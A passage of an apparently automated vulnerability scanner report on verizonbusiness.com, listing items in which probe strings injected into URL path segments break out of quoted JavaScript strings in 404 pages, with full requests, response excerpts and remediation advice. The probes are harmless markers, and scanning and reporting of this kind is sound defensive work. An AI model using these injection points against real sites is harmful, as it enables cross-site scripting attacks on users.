User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:26 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40370
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/casestudies9595a";ae90b39e3fa/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
h
...[SNIP]...

1.767. http://www.verizonbusiness.com/resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1f2a'%3b183fd12aec4 was submitted in the REST URL parameter 3. This input was echoed as c1f2a';183fd12aec4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdfc1f2a'%3b183fd12aec4 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:59 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40368
Date: Wed, 17 Nov 2010 00:04:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdfc1f2a';183fd12aec4'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.768. http://www.verizonbusiness.com/resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f698a"%3b396859a35d6 was submitted in the REST URL parameter 3. This input was echoed as f698a";396859a35d6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdff698a"%3b396859a35d6 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:44 GMT
Content-Type: text/html
Content-Length: 40370
Date: Wed, 17 Nov 2010 00:04:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
x.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdff698a";396859a35d6";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.769. http://www.verizonbusiness.com/resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 402ac"%3b22bdcc78454 was submitted in the REST URL parameter 1. This input was echoed as 402ac";22bdcc78454 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources402ac"%3b22bdcc78454/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:03:43 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40714
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:03:43 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:03:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources402ac";22bdcc78454/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//
...[SNIP]...

1.770. http://www.verizonbusiness.com/resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f4e4'%3b474c2e6f934 was submitted in the REST URL parameter 1. This input was echoed as 7f4e4';474c2e6f934 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources7f4e4'%3b474c2e6f934/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:10 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40714
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/resources7f4e4';474c2e6f934/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.771. http://www.verizonbusiness.com/resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce34f"%3bbe3e8eccb23 was submitted in the REST URL parameter 2. This input was echoed as ce34f";be3e8eccb23 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/casestudiesce34f"%3bbe3e8eccb23/cs_mitsui-verizon-consolidating-it_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:18 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40322
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/casestudiesce34f";be3e8eccb23/cs_mitsui-verizon-consolidating-it_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDAT
...[SNIP]...

1.772. http://www.verizonbusiness.com/resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c56f'%3bbaa2cf6c60f was submitted in the REST URL parameter 2. This input was echoed as 8c56f';baa2cf6c60f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/casestudies8c56f'%3bbaa2cf6c60f/cs_mitsui-verizon-consolidating-it_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:24 GMT
Content-Type: text/html
Content-Length: 40322
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/casestudies8c56f';baa2cf6c60f/cs_mitsui-verizon-consolidating-it_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.773. http://www.verizonbusiness.com/resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7429d'%3bb5039ad7341 was submitted in the REST URL parameter 3. This input was echoed as 7429d';b5039ad7341 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf7429d'%3bb5039ad7341 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:40 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40322
Date: Wed, 17 Nov 2010 00:04:40 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf7429d';b5039ad7341'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.774. http://www.verizonbusiness.com/resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc2e7"%3b7119dbd91ae was submitted in the REST URL parameter 3. This input was echoed as dc2e7";7119dbd91ae in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdfdc2e7"%3b7119dbd91ae HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:32 GMT
Content-Type: text/html
Content-Length: 40322
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdfdc2e7";7119dbd91ae";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.775. http://www.verizonbusiness.com/resources/factsheets/fc_Security-Solutions-for-Retail [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/factsheets/fc_Security-Solutions-for-Retail

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5218'%3bf65fc3ed524 was submitted in the REST URL parameter 1. This input was echoed as e5218';f65fc3ed524 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcese5218'%3bf65fc3ed524/factsheets/fc_Security-Solutions-for-Retail HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:22:36 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40686
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:22:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:22:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resourcese5218';f65fc3ed524/factsheets/fc_Security-Solutions-for-Retail'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.776. http://www.verizonbusiness.com/resources/factsheets/fc_Security-Solutions-for-Retail [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/factsheets/fc_Security-Solutions-for-Retail

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77bf7"%3bc515644d40 was submitted in the REST URL parameter 1. This input was echoed as 77bf7";c515644d40 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources77bf7"%3bc515644d40/factsheets/fc_Security-Solutions-for-Retail HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:22:13 GMT
Content-Type: text/html
Content-Length: 40684
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:22:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:22:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources77bf7";c515644d40/factsheets/fc_Security-Solutions-for-Retail";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATI
...[SNIP]...

1.777. http://www.verizonbusiness.com/resources/factsheets/fc_Security-Solutions-for-Retail [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/factsheets/fc_Security-Solutions-for-Retail

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ff7a'%3b7dacbee1b48 was submitted in the REST URL parameter 2. This input was echoed as 2ff7a';7dacbee1b48 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/factsheets2ff7a'%3b7dacbee1b48/fc_Security-Solutions-for-Retail HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:22:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40298
Date: Wed, 17 Nov 2010 00:23:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:22:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/factsheets2ff7a';7dacbee1b48/fc_Security-Solutions-for-Retail'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.778. http://www.verizonbusiness.com/resources/factsheets/fc_Security-Solutions-for-Retail [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/factsheets/fc_Security-Solutions-for-Retail

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94e05"%3b23fa5ff016e was submitted in the REST URL parameter 2. This input was echoed as 94e05";23fa5ff016e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/factsheets94e05"%3b23fa5ff016e/fc_Security-Solutions-for-Retail HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
